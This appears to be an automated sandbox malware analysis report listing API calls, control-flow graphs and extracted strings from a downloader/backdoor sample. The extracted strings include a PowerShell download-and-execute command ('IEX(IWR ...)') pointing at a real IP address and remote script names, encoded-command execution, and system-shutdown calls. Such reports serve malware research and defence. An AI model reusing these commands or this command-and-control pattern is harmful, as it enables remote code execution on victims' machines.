                              • Opcode Fuzzy Hash: 61eb2c024791c9cea42fbda7cef9d1546da1acbc23d5c0b8ed24c47be1284682
                              • Instruction Fuzzy Hash: 905169B1909A15CBDB14CF98DDD17AABBF1FB48309F24806AD821EF650D3B49A84CF50
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CountTick
                              • String ID:
                              • API String ID: 536389180-0
                              • Opcode ID: 5f180ecc7513154e70ec6bd00d0426182167aa8c226eb61c155ad297768e7dc8
                              • Instruction ID: 435e0db7e26a5f9503c93d382b6f1b7c24624031e8aa37240065287c0df1c463
                              • Opcode Fuzzy Hash: 5f180ecc7513154e70ec6bd00d0426182167aa8c226eb61c155ad297768e7dc8
                              • Instruction Fuzzy Hash: 38318E32311411CBCB6CCE2CE8B5A6977E2B789320B194529D99AC72C9D73AE802CB44
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005022,0015482B), ref: 0015501B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 8dedf664292a6d002e3874a2ce6ab83599abdf66e3a549459fea04710289f7d5
                              • Instruction ID: 2ba8e5938588f4006acffd3e789c64db49d0c361323c465511ba9014e04dcaa8
                              • Opcode Fuzzy Hash: 8dedf664292a6d002e3874a2ce6ab83599abdf66e3a549459fea04710289f7d5
                              • Instruction Fuzzy Hash:
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: b23b60360416ddcb715adcdecc1b8f3953d08bca1481c9cc4884095518749088
                              • Instruction ID: 8e317b8e115ba844f136e6290360d2d2f2d6cb3a7cff7968765c34e4ceeab1ab
                              • Opcode Fuzzy Hash: b23b60360416ddcb715adcdecc1b8f3953d08bca1481c9cc4884095518749088
                              • Instruction Fuzzy Hash: E851C531E143D84EDF1D8BED58602FDBFB19F56200F5841BED8D5AB642C5344A09CB61
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: d731cc865410fdb59f3183ab67dc1e5b1ee1774501fb9d553980f4b6258061cd
                              • Instruction ID: 7d8ee0f68911bc03bdf1ee3ac4282dd4c149919c6c58e5a2e50b8cf6ec4e9170
                              • Opcode Fuzzy Hash: d731cc865410fdb59f3183ab67dc1e5b1ee1774501fb9d553980f4b6258061cd
                              • Instruction Fuzzy Hash: 44A02430300101CF4340CF355F0531D35FC57015D13004014D404C0430DF7040C04F01
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b678e1e5cadbc279f30897db864cd64de87305a752ae210852434c5fb4679b8f
                              • Instruction ID: 2bedd3f9cdfb31d334da9f7fe6fce273722801165721319b08c79019e68eb5e6
                              • Opcode Fuzzy Hash: b678e1e5cadbc279f30897db864cd64de87305a752ae210852434c5fb4679b8f
                              • Instruction Fuzzy Hash: 7E724C3582919A8EDF5CEB64D9746EC7B34BF22300F8401FDC48A56566EF311A89EF60
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                              • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
                              • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                              • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 389 10980e0-1098135 wsprintfA GetTickCount64 call 1092800 392 1098138-1098159 call 1096810 389->392 395 109815b-109816b Sleep 392->395 396 109816d-109817b lstrcmpA 392->396 395->392 397 109817d-109818c call 10992b0 call 1095760 396->397 398 109818e-10981b8 call 10965c0 * 2 call 10963d0 396->398 397->392 409 109863b-1098659 GetTickCount64 398->409 410 10981be-10981c0 398->410 412 109865b 409->412 413 109867e-109869b call 1095760 Sleep 409->413 410->409 411 10981c6-10981cc 410->411 411->409 414 10981d2-1098245 call 1095780 call 10976f0 call 1092660 call 1095740 call 1095780 call 10965c0 call 1092800 call 10976d0 StrToIntA 411->414 416 109865d-109865f 412->416 417 1098661-109867b call 1092800 call 10976d0 412->417 413->392 439 109824b 414->439 440 1098631-1098639 call 1095760 414->440 416->413 416->417 417->413 441 1098613-109861a call 1096350 439->441 442 1098252-1098266 call 10965c0 * 2 439->442 440->413 441->440 449 109861c-109862b InitiateSystemShutdownExW 441->449 442->440 452 109826c-109826e 442->452 449->440 452->440 453 1098274-109829d StrToIntA call 10963d0 call 1095740 452->453 453->440 458 10982a3-10982a9 453->458 459 10982ab-10982ed GetSystemDirectoryW PathCombineW wnsprintfW 458->459 460 10982ef-10982f2 458->460 461 1098344-109838b GetModuleHandleA GetProcAddress * 2 459->461 460->461 462 10982f4-109830d call 10963d0 call 1092940 460->462 464 109838d-1098390 461->464 465 1098393-1098397 461->465 462->461 475 109830f-109833f ExpandEnvironmentStringsW wnsprintfW call 1095760 462->475 464->465 467 1098399-10983ae call 1095830 465->467 468 10983d1-10983f5 LoadLibraryA GetProcAddress 465->468 472 10983f9-10983fe 467->472 474 10983b0-10983cf call 10963d0 call 1092830 call 1095760 467->474 468->472 476 1098400 472->476 477 1098405-1098417 call 1095740 472->477 474->472 475->461 476->477 484 10984b8-10984cf call 1095760 * 3 477->484 485 109841d-10984a2 call 1099250 call 10976f0 wsprintfA wnsprintfA call 1092660 call 1096810 477->485 484->413 503 10984ab-10984b5 call 1095760 485->503 504 10984a4-10984a6 call 1095760 485->504 503->484 504->503
                              APIs
                              • wsprintfA.USER32 ref: 01098106
                              • GetTickCount64.KERNEL32 ref: 01098114
                                • Part of subcall function 01096810: ObtainUserAgentString.URLMON(00000000,?,01099388), ref: 01096832
                                • Part of subcall function 01096810: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096852
                                • Part of subcall function 01096810: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010968B8
                                • Part of subcall function 01096810: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 010968FB
                                • Part of subcall function 01096810: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01096918
                                • Part of subcall function 01096810: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 01096951
                                • Part of subcall function 01096810: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0109697A
                              • Sleep.KERNEL32(00000000), ref: 01098166
                              • lstrcmpA.KERNEL32(00000000,INIT), ref: 01098173
                              • StrToIntA.SHLWAPI(00000000), ref: 01098236
                              • StrToIntA.SHLWAPI(00000000), ref: 0109827B
                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010982B7
                              • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 010982D0
                              • wnsprintfW.SHLWAPI ref: 010982E4
                              • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 01098320
                              • wnsprintfW.SHLWAPI ref: 01098334
                                • Part of subcall function 01095760: GetProcessHeap.KERNEL32(00000000,00000000,01098685), ref: 01095767
                                • Part of subcall function 01095760: HeapFree.KERNEL32(00000000), ref: 0109576E
                              • GetModuleHandleA.KERNEL32(kernel32), ref: 01098357
                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098365
                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0109837A
                              • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 010983DB
                              • GetProcAddress.KERNEL32(00000000), ref: 010983E2
                              • wsprintfA.USER32 ref: 01098442
                              • wnsprintfA.SHLWAPI ref: 0109846E
                                • Part of subcall function 01092940: GetProcessHeap.KERNEL32(00000008,?), ref: 01092952
                                • Part of subcall function 01092940: HeapAlloc.KERNEL32(00000000), ref: 01092959
                              • Sleep.KERNEL32(00000000), ref: 01098696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
                              • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
                              • API String ID: 1920831074-1153165106
                              • Opcode ID: ef56443332e923c265a6e437422752ed76abe527811c9aa613d63f6811415dbd
                              • Instruction ID: c34ac73016c69ac49c76c296aaa9ac91bbc493ed598a0c1ce701d7677873a7c2
                              • Opcode Fuzzy Hash: ef56443332e923c265a6e437422752ed76abe527811c9aa613d63f6811415dbd
                              • Instruction Fuzzy Hash: A6C1E871E00209ABCF14EBB5DCB4AEEB7B5BF54710F00405AE585AB384EB759E04DB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 508 1096810-1096858 ObtainUserAgentString MultiByteToWideChar 509 109685a-109685f 508->509 510 1096861-109687d GetProcessHeap HeapAlloc 508->510 511 1096899-10968a5 call 1096650 509->511 512 109687f-1096895 MultiByteToWideChar 510->512 513 1096897 510->513 516 10968a7-10968c5 InternetOpenW 511->516 512->511 513->511 517 10968cb-10968e9 516->517 518 1096a47-1096a4b 516->518 521 10968f0-1096905 InternetSetOptionW 517->521 519 1096a4d-1096a52 518->519 520 1096a57-1096a68 518->520 519->516 522 1096a6a-1096a70 GetProcessHeap HeapFree 520->522 523 1096a72-1096a77 520->523 521->521 524 1096907-1096925 InternetConnectW 521->524 522->523 525 1096a79-1096a7f GetProcessHeap HeapFree 523->525 526 1096a81-1096a86 523->526 527 1096a39-1096a42 InternetCloseHandle 524->527 528 109692b-109695b HttpOpenRequestW 524->528 525->526 530 1096a88-1096a8e GetProcessHeap HeapFree 526->530 531 1096a90-1096a98 526->531 527->520 529 1096a44 527->529 532 1096a2d 528->532 533 1096961-1096982 InternetQueryOptionW 528->533 529->518 530->531 536 1096a33-1096a36 InternetCloseHandle 532->536 534 109699a-10969b0 HttpSendRequestW 533->534 535 1096984-1096994 InternetSetOptionW 533->535 537 1096a22-1096a2b InternetCloseHandle 534->537 538 10969b2 534->538 535->534 536->527 537->536 539 10969b4-10969cf InternetQueryDataAvailable 538->539 540 10969d1-10969d6 539->540 541 1096a12-1096a14 539->541 542 10969e9-10969f3 GetProcessHeap HeapReAlloc 540->542 543 10969d8-10969e7 GetProcessHeap HeapAlloc 540->543 541->539 544 1096a16-1096a1b 541->544 545 10969f9-1096a10 InternetReadFile 542->545 543->545 546 1096a1d 544->546 547 1096a1f 544->547 545->541 546->547 547->537
                              APIs
                              • ObtainUserAgentString.URLMON(00000000,?,01099388), ref: 01096832
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096852
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0109686B
                              • HeapAlloc.KERNEL32(00000000), ref: 01096872
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096893
                              • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010968B8
                              • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 010968FB
                              • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01096918
                              • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 01096951
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0109697A
                              • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 01096994
                              • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,0000EA60), ref: 010969A8
                              • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 010969C4
                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010969DA
                              • HeapAlloc.KERNEL32(00000000), ref: 010969E1
                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 010969EC
                              • HeapReAlloc.KERNEL32(00000000), ref: 010969F3
                              • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 01096A07
                              • InternetCloseHandle.WININET(00000000), ref: 01096A29
                              • InternetCloseHandle.WININET(00000000), ref: 01096A34
                              • InternetCloseHandle.WININET(00000000), ref: 01096A3A
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01096A6D
                              • HeapFree.KERNEL32(00000000), ref: 01096A70
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01096A7C
                              • HeapFree.KERNEL32(00000000), ref: 01096A7F
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01096A8B
                              • HeapFree.KERNEL32(00000000), ref: 01096A8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
                              • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
                              • API String ID: 2744214989-3343008755
                              • Opcode ID: 21b623fd7ac1fb9717cde2cfa1e247f355f9791d4e94acf2a77cb5b6decf9409
                              • Instruction ID: 62f64e496b7667809ab51c7ba9acfe450722752adfeace51ee7f9135796af292
                              • Opcode Fuzzy Hash: 21b623fd7ac1fb9717cde2cfa1e247f355f9791d4e94acf2a77cb5b6decf9409
                              • Instruction Fuzzy Hash: 3A71B2B1A40219ABEF209BA5DC59FAE7BBCFF04710F140159FA51F7280DB7599009B64

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001531C0: task.LIBCPMTD ref: 001532A1
                                • Part of subcall function 001531C0: task.LIBCPMTD ref: 001532B0
                              • task.LIBCPMTD ref: 00153748
                                • Part of subcall function 00153410: task.LIBCPMTD ref: 0015342D
                                • Part of subcall function 00153410: task.LIBCPMTD ref: 00153435
                                • Part of subcall function 00153410: task.LIBCPMTD ref: 0015343D
                                • Part of subcall function 00153450: task.LIBCPMTD ref: 00153522
                                • Part of subcall function 00153450: task.LIBCPMTD ref: 00153531
                                • Part of subcall function 00153640: task.LIBCPMTD ref: 00153653
                                • Part of subcall function 00152A80: task.LIBCPMTD ref: 00152A8A
                                • Part of subcall function 00152B80: task.LIBCPMTD ref: 00152C4A
                                • Part of subcall function 00152B80: task.LIBCPMTD ref: 00152C59
                              • task.LIBCPMTD ref: 001538A7
                                • Part of subcall function 00152D00: task.LIBCPMTD ref: 00152D8B
                                • Part of subcall function 00152D00: task.LIBCPMTD ref: 00152D97
                                • Part of subcall function 00152D00: task.LIBCPMTD ref: 00152DA3
                                • Part of subcall function 00152D00: task.LIBCPMTD ref: 00152DB2
                                • Part of subcall function 00151BC0: task.LIBCPMTD ref: 00151CB3
                                • Part of subcall function 00151BC0: task.LIBCPMTD ref: 00151CC2
                                • Part of subcall function 00151DD0: task.LIBCPMTD ref: 00151E73
                                • Part of subcall function 00151DD0: task.LIBCPMTD ref: 00151E82
                                • Part of subcall function 00151FE0: task.LIBCPMTD ref: 00152065
                                • Part of subcall function 00151FE0: task.LIBCPMTD ref: 00152074
                                • Part of subcall function 001521D0: task.LIBCPMTD ref: 001522AD
                                • Part of subcall function 001521D0: task.LIBCPMTD ref: 001522BC
                              • task.LIBCPMTD ref: 00153B39
                                • Part of subcall function 001527E0: task.LIBCPMTD ref: 00152805
                              • task.LIBCPMTD ref: 00153BD3
                              Strings
                              • kiaoobdghby, xrefs: 00153928
                              • xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus, xrefs: 00153B46
                              • erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj, xrefs: 00153773
                              • mszimdsmagcsvicmxoepfxhbkeaeo, xrefs: 001537C6
                              • hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb, xrefs: 001536D4
                              • qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax, xrefs: 001537F2
                              • qdgrecqxaamyajazrwulmwar, xrefs: 001536A3
                              • bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze, xrefs: 00153A65
                              • lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur, xrefs: 00153A37
                              • cct, xrefs: 00153BA3
                              • jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg, xrefs: 00153813
                              • pfytwtrjvw, xrefs: 001538E7
                              • wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf, xrefs: 001538CB
                              • eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp, xrefs: 00153B7F
                              • auflmecuefrwdklytrcnktmoa, xrefs: 001539A6
                              • gvnzsipipcghsiqztwv, xrefs: 0015378C
                              • mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce, xrefs: 00153946
                              • nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp, xrefs: 001539C2
                              • pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu, xrefs: 00153757
                              • uxxztqzgwwuzqaevnavsfydrh, xrefs: 00153900
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: auflmecuefrwdklytrcnktmoa$bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze$cct$eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp$erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj$gvnzsipipcghsiqztwv$hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb$jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg$kiaoobdghby$lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur$mszimdsmagcsvicmxoepfxhbkeaeo$mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce$nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp$pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu$pfytwtrjvw$qdgrecqxaamyajazrwulmwar$qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax$uxxztqzgwwuzqaevnavsfydrh$wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf$xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus
                              • API String ID: 1384045349-3352526687
                              • Opcode ID: 521c3bc11b47c74059ee4d5a32ee945867246cd9de91e7bd4a2583ec563d9980
                              • Instruction ID: 345e67aa5a2d552ac22bad071a3ddcbc45a66e564dd5a944fbdd731be5150cc2
                              • Opcode Fuzzy Hash: 521c3bc11b47c74059ee4d5a32ee945867246cd9de91e7bd4a2583ec563d9980
                              • Instruction Fuzzy Hash: 64E12A70E50B08AAD701FF78CD127AEBB75AB16B41F404319F8653F5C1EBB116988B92
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: S$ayufwgulvuygbab$cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza$duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre$gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv$hczcjatmoheclnpwaqmeqzj$xkmhkueozjyetdrqi
                              • API String ID: 1384045349-3540177847
                              • Opcode ID: 487f03bd8506d70ab22948f2653de13435b742baf74a5ba1085fad46ac94e163
                              • Instruction ID: 8fe6604260027fec9804693b2f095d5f9425b9018393694a9f16cd3638bd88fe
                              • Opcode Fuzzy Hash: 487f03bd8506d70ab22948f2653de13435b742baf74a5ba1085fad46ac94e163
                              • Instruction Fuzzy Hash: BDB13671904268CEDB24DB64CD51BDDBBB0AB22345F1081DAE8697B282DB705F88DF61
                              APIs
                              • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 010988E1
                              • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 010988F4
                              • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 01098907
                              • GetFileAttributesW.KERNEL32(?), ref: 0109892D
                              • GetFileAttributesW.KERNEL32(?), ref: 01098946
                              • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 0109895D
                              • wnsprintfW.SHLWAPI ref: 01098980
                              • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 010989A2
                              Strings
                              • %ComSpec%, xrefs: 01098902
                              • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 010988EF
                              • sd4.ps1, xrefs: 01098951
                              • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 010988DC
                              • open, xrefs: 0109899B
                              • http://217.195.153.196/assets, xrefs: 0109896A
                              • sd2.ps1, xrefs: 01098938
                              • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 0109896F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
                              • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$http://217.195.153.196/assets$open$sd2.ps1$sd4.ps1
                              • API String ID: 4132772799-332074121
                              • Opcode ID: 280bae9d71075ed566a3d57da415f46b688ce8bd8cf11a7e6ff36d0a15b7652a
                              • Instruction ID: b9d71f712433895a9b2fe92f2274d9b34d9d2521eb3601ecd5931929645ea3ae
                              • Opcode Fuzzy Hash: 280bae9d71075ed566a3d57da415f46b688ce8bd8cf11a7e6ff36d0a15b7652a
                              • Instruction Fuzzy Hash: 1B212771A4021D6BEF20D6949C65FEA77ACFB05724F4401D6F6D8E60C0E7B05A848F91
                              APIs
                              • CreatePipe.KERNEL32(?,?,?,00000000), ref: 01095863
                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958C1
                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958D4
                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958D9
